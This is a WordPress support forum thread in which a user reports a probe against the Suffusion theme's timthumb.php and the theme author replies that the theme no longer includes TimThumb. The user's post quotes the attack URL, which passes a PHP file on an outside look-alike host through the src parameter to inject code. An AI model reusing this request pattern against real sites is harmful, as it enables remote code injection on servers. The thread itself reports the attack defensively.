Security Issue : timthumb.php | ww.wp.xz.cn

ltoinel
(@ltoinel)

13 years, 5 months ago

Hi, I don’t use Wordress, however I received some attack in destination of the suffusion theme :

http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php

The attacker seems to use a fake host to inject malicious php code.

Cheers !

Viewing 1 replies (of 1 total)

Theme Author Sayontan Sinha
(@sayontan)

13 years, 5 months ago

Suffusion doesn’t have TimThumb. You can verify the source code from the official WP repository: http://themes.svn.ww.wp.xz.cn/suffusion/4.4.4/. The last version of Suffusion to have TimThumb was 3.7.1, which was almost 2 years back. In fact I took TimThumb out of Suffusion 6 months before the TimThumb vulnerability was discovered.

Attackers try thousands of random strings in the hopes of injecting malicious code, but rest assured that TimThumb is not a part of the Suffusion code. Moreover, every theme distributed through http://ww.wp.xz.cn/extend/themes/ goes through a review, and TimThumb is not allowed in your code. So there is no theme on this site that has TimThumb in it.

Viewing 1 replies (of 1 total)

The topic ‘Security Issue : timthumb.php’ is closed to new replies.

1 reply
2 participants
Last reply from: Sayontan Sinha
Last activity: 13 years, 5 months ago
Status: not a support question